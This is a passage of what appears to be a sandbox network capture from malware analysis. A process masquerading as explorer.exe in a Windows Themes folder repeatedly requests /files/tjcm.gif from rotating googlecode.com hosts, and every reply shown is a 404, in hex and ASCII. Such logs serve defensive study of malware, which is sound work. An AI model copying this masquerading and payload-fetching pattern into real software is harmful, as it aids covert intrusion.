Sep 2, 2024 14:25:14.839349985 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:15.530133963 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:15 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:15.530164003 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49760	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:16.157552958 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:16.845231056 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:16 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:16.845249891 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49761	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:17.253554106 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:17.957392931 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:17 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:17.957453012 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49762	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:18.374253988 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:19.066195011 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:18 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:19.066226959 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49763	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:19.502393007 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:20.201138973 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:20 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:20.201159000 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49764	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:20.528918028 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:21.942418098 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:21 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:21.942468882 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Sep 2, 2024 14:25:21.942503929 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Sep 2, 2024 14:25:21.943069935 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:21 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:21.943511009 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:21 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 